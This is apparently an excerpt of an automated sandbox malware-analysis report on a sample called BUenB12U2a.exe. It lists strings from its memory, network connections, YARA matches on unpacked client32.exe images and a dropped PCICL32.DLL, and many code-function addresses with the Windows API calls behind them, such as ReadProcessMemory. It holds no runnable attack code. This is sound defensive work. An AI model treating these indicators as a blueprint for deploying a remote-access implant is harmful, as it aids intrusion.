                                Source: BUenB12U2a.exe, 00000001.00000003.1934980415.0000021010F20000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1940351339.0000021010F20000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1932267047.0000021010F19000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1796609195.0000021010EF1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1746596680.0000021010EF5000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1747515012.0000021010EE6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1933216068.0000021010F4B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1931303850.0000021010F3D000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1745749336.0000021010F19000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1932411030.0000021010F43000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1945256061.0000021010F20000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1931354269.0000021010F42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                                Source: BUenB12U2a.exe, 00000001.00000002.1960573017.0000021010D60000.00000004.00001000.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1738443135.0000021010BDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
                                Source: BUenB12U2a.exe, 00000001.00000003.1745512625.0000021010B46000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1941153963.0000021010B36000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1937707928.0000021010B24000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1942653885.0000021010B4D000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1747967588.0000021010B24000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1746907747.0000021010B24000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1933544435.0000021010B24000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1796873239.0000021010B24000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1743678024.0000021010B46000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1938034088.0000021010B35000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1942117642.0000021010B4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/html/sec-forms.html#multipart-form-data
                                Source: BUenB12U2a.exe, 00000001.00000003.1933068750.00000210118E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.archive.org/web/20120328125543/http://www.jpegcameras.com/libjpeg/libjpeg-3.html
                                Source: BUenB12U2a.exe, 00000000.00000003.1717870193.0000021D68864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/
                                Source: BUenB12U2a.exe, 00000000.00000003.1717841304.0000021D68872000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1717925246.0000021D68872000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1717870193.0000021D68864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
                                Source: BUenB12U2a.exe, 00000000.00000003.1722697539.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.1967340348.00007FFDFB2BA000.00000002.00000001.01000000.00000010.sdmp, BUenB12U2a.exe, 00000001.00000002.1970633037.00007FFE0081F000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: https://www.openssl.org/H
                                Source: BUenB12U2a.exe, 00000001.00000003.1743678024.0000021010B8F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1739658195.0000021010BBC000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1933279770.0000021010B8B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1739499963.0000021010BBB000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1738266697.0000021010BA4000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1930611882.0000021010B63000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1796873239.0000021010B5F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1747967588.0000021010B5F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1937139834.0000021010BD0000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1745222625.0000021010B8F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1746907747.0000021010B5F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1936047890.0000021010BC1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1738351251.0000021010BC7000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1740810132.0000021010BBB000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1742241116.0000021010B92000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1932364121.0000021010B7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
                                Source: BUenB12U2a.exe, 00000001.00000003.1745512625.0000021010B65000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1930611882.0000021010B63000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1796873239.0000021010B5F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1747967588.0000021010B5F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1746907747.0000021010B5F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1941840903.0000021010B6C000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1744887932.00000210110A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
                                Source: BUenB12U2a.exe, 00000001.00000003.1736237938.0000021010894000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1736907075.000002101088B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1736564229.000002101088F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1736297054.000002101087B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.1958451151.00000210103C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
                                Source: BUenB12U2a.exe, 00000001.00000002.1968033662.00007FFDFB6F0000.00000004.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.python.org/psf/license/
                                Source: BUenB12U2a.exe, 00000001.00000003.1928713157.00000210111A4000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1930204730.00000210111A4000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1904345143.0000021011161000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1905189440.0000021011184000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
                                Source: BUenB12U2a.exe, 00000001.00000003.1955835239.0000021011144000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1904345143.0000021011161000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1929712668.000002101113A000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1929732476.000002101113D000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1929753262.0000021011143000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1930350917.0000021011144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                                Source: Yara matchFile source: 15.2.client32.exe.6c7c0658.5.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.BUenB12U2a.exe.21012184cb8.13.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.6c7c0658.6.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 16.2.client32.exe.6c7c0658.5.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.BUenB12U2a.exe.21011926cf8.12.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.2.client32.exe.6c620000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.6c620000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 16.2.client32.exe.6c620000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000006.00000002.4179457896.000000006C79E000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000F.00000002.1937304626.000000006C79E000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2017121841.000000006C79E000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1801257189.00000210120E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1799989658.00000210118E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: BUenB12U2a.exe PID: 7484, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\extracted\PCICL32.DLL, type: DROPPED
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE10301E90 PyList_New,GetActiveProcessorCount,PyErr_SetFromWindowsErr,_Py_Dealloc,free,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,PyExc_RuntimeError,PyErr_SetString,malloc,PyErr_NoMemory,NtQuerySystemInformation,Py_BuildValue,PyList_Append,_Py_Dealloc,free,_Py_Dealloc,1_2_00007FFE10301E90
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE10305850 PyArg_ParseTuple,OpenProcess,GetLastError,NtSetInformationProcess,CloseHandle,_Py_NoneStruct,_Py_NoneStruct,1_2_00007FFE10305850
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE10306640 PyList_New,EnterCriticalSection,GetProcessHeap,HeapAlloc,PyErr_NoMemory,_Py_Dealloc,NtQuerySystemInformation,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,NtQuerySystemInformation,GetProcessHeap,HeapFree,PyExc_RuntimeError,PyErr_SetString,GetCurrentProcess,DuplicateHandle,PyUnicode_FromWideChar,PyList_Append,_Py_Dealloc,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,_Py_Dealloc,GetProcessHeap,HeapFree,LeaveCriticalSection,1_2_00007FFE10306640
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE10304AB0 PyArg_ParseTuple,OpenProcess,GetLastError,GetProcessHeap,HeapAlloc,NtQueryVirtualMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,NtQueryVirtualMemory,PyExc_RuntimeError,PyErr_SetString,CloseHandle,PyErr_Clear,GetProcessHeap,HeapFree,CloseHandle,GetProcessHeap,HeapFree,CloseHandle,Py_BuildValue,PyErr_NoMemory,CloseHandle,1_2_00007FFE10304AB0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE10306290 GetProcessHeap,HeapAlloc,GetFileType,SetLastError,NtQueryObject,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,PyErr_NoMemory,GetProcessHeap,HeapFree,1_2_00007FFE10306290
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE10302480 GetActiveProcessorCount,PyErr_SetFromWindowsErr,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,PyExc_RuntimeError,PyErr_SetString,malloc,PyErr_NoMemory,NtQuerySystemInformation,free,malloc,PyErr_NoMemory,NtQuerySystemInformation,malloc,PyErr_NoMemory,NtQuerySystemInformation,free,free,free,free,free,Py_BuildValue,1_2_00007FFE10302480
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE10307480 malloc,NtQuerySystemInformation,free,malloc,PyErr_NoMemory,free,free,1_2_00007FFE10307480
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE10306E80 PyExc_RuntimeError,PyErr_SetString,OpenProcess,GetLastError,NtQueryInformationProcess,CloseHandle,CloseHandle,calloc,PyErr_NoMemory,CloseHandle,NtQueryInformationProcess,calloc,PyErr_NoMemory,free,CloseHandle,wcscpy_s,free,CloseHandle,1_2_00007FFE10306E80
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE10306AE0 OpenProcess,GetLastError,NtQueryInformationProcess,RtlNtStatusToDosErrorNoTeb,PyErr_SetFromWindowsErrWithFilename,CloseHandle,ReadProcessMemory,GetLastError,CloseHandle,ReadProcessMemory,NtQueryInformationProcess,CloseHandle,ReadProcessMemory,ReadProcessMemory,VirtualQueryEx,GetLastError,PyErr_SetFromWindowsErrWithFilename,CloseHandle,calloc,PyErr_NoMemory,CloseHandle,ReadProcessMemory,GetLastError,CloseHandle,free,CloseHandle,1_2_00007FFE10306AE0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE103046C0 PyArg_ParseTuple,GetProcessHeap,HeapAlloc,NtQuerySystemInformation,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,NtQuerySystemInformation,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,NtQuerySystemInformation,GetProcessHeap,HeapFree,Py_BuildValue,PyUnicode_FromWideChar,GetProcessHeap,HeapFree,PyErr_NoMemory,1_2_00007FFE103046C0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE10305760 PyArg_ParseTuple,OpenProcess,GetLastError,NtQueryInformationProcess,CloseHandle,Py_BuildValue,1_2_00007FFE10305760
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE10304D40 PyArg_ParseTuple,OpenProcess,GetLastError,PyObject_IsTrue,NtSuspendProcess,NtResumeProcess,CloseHandle,_Py_NoneStruct,_Py_NoneStruct,1_2_00007FFE10304D40
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE10302B00: PyDict_New,swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,Py_BuildValue,PyDict_SetItemString,_Py_Dealloc,CloseHandle,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,PyErr_SetFromWindowsErr,_Py_Dealloc,_Py_Dealloc,CloseHandle,1_2_00007FFE10302B00
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748B169D40_2_00007FF748B169D4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748B109380_2_00007FF748B10938
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748AF8BD00_2_00007FF748AF8BD0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748B15C700_2_00007FF748B15C70
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748AF10000_2_00007FF748AF1000
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748B021D40_2_00007FF748B021D4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748B019B40_2_00007FF748B019B4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748B03A140_2_00007FF748B03A14
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748B1411C0_2_00007FF748B1411C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748B081540_2_00007FF748B08154
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748B0DACC0_2_00007FF748B0DACC
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748B01BC00_2_00007FF748B01BC0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748AFA34B0_2_00007FF748AFA34B
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748AFA4E40_2_00007FF748AFA4E4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748B13C800_2_00007FF748B13C80
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748B164880_2_00007FF748B16488
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748B109380_2_00007FF748B10938
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748B02C800_2_00007FF748B02C80
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748B0E5E00_2_00007FF748B0E5E0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748B01DC40_2_00007FF748B01DC4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748B05DA00_2_00007FF748B05DA0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748B036100_2_00007FF748B03610
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748AFAD1D0_2_00007FF748AFAD1D
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748B15EEC0_2_00007FF748B15EEC
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748B09F100_2_00007FF748B09F10
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748B01FD00_2_00007FF748B01FD0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748B017B00_2_00007FF748B017B0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748B088040_2_00007FF748B08804
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748B197980_2_00007FF748B19798
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748B0DF600_2_00007FF748B0DF60
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748B118E40_2_00007FF748B118E4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748AF98700_2_00007FF748AF9870
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748B169D41_2_00007FF748B169D4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748B15C701_2_00007FF748B15C70
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748AF10001_2_00007FF748AF1000
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748B021D41_2_00007FF748B021D4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748B019B41_2_00007FF748B019B4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748B03A141_2_00007FF748B03A14
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748B1411C1_2_00007FF748B1411C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748B109381_2_00007FF748B10938
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748B081541_2_00007FF748B08154
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748B0DACC1_2_00007FF748B0DACC
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748AF8BD01_2_00007FF748AF8BD0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748B01BC01_2_00007FF748B01BC0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748AFA34B1_2_00007FF748AFA34B
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748AFA4E41_2_00007FF748AFA4E4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748B13C801_2_00007FF748B13C80
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748B164881_2_00007FF748B16488
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748B109381_2_00007FF748B10938
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748B02C801_2_00007FF748B02C80
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748B0E5E01_2_00007FF748B0E5E0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748B01DC41_2_00007FF748B01DC4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748B05DA01_2_00007FF748B05DA0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748B036101_2_00007FF748B03610
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748AFAD1D1_2_00007FF748AFAD1D
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748B15EEC1_2_00007FF748B15EEC
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748B09F101_2_00007FF748B09F10
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748B01FD01_2_00007FF748B01FD0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748B017B01_2_00007FF748B017B0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748B088041_2_00007FF748B08804
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748B197981_2_00007FF748B19798
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748B0DF601_2_00007FF748B0DF60
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748B118E41_2_00007FF748B118E4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748AF98701_2_00007FF748AF9870
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFACB18901_2_00007FFDFACB1890
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076116D1_2_00007FFE0076116D
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761B541_2_00007FFE00761B54
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007983F01_2_00007FFE007983F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007CC5301_2_00007FFE007CC530
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761A0F1_2_00007FFE00761A0F
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007686301_2_00007FFE00768630
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007616FE1_2_00007FFE007616FE
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007D26E01_2_00007FFE007D26E0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007617F81_2_00007FFE007617F8
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076143D1_2_00007FFE0076143D
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007613DE1_2_00007FFE007613DE
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007626FD1_2_00007FFE007626FD
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007626121_2_00007FFE00762612
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007616181_2_00007FFE00761618
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076117C1_2_00007FFE0076117C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076149C1_2_00007FFE0076149C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007624D71_2_00007FFE007624D7
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007621C11_2_00007FFE007621C1
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761C121_2_00007FFE00761C12
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007770B01_2_00007FFE007770B0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007AD2F01_2_00007FFE007AD2F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076155A1_2_00007FFE0076155A
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007A93701_2_00007FFE007A9370
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761FD71_2_00007FFE00761FD7
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0078B7001_2_00007FFE0078B700
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007AD7C01_2_00007FFE007AD7C0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007A57701_2_00007FFE007A5770
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007615961_2_00007FFE00761596
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007615461_2_00007FFE00761546
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007621DF1_2_00007FFE007621DF
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761AD71_2_00007FFE00761AD7
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007D9B301_2_00007FFE007D9B30
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00785CF01_2_00007FFE00785CF0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761CBC1_2_00007FFE00761CBC
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761EDD1_2_00007FFE00761EDD
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761D8E1_2_00007FFE00761D8E
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0133F1B01_2_00007FFE0133F1B0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE013319401_2_00007FFE01331940
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0136E9601_2_00007FFE0136E960
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0133C1741_2_00007FFE0133C174
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE01334A001_2_00007FFE01334A00
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE013462201_2_00007FFE01346220
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0133C8901_2_00007FFE0133C890
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0138F8A81_2_00007FFE0138F8A8
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE013458A41_2_00007FFE013458A4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE013488A01_2_00007FFE013488A0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE013400B01_2_00007FFE013400B0
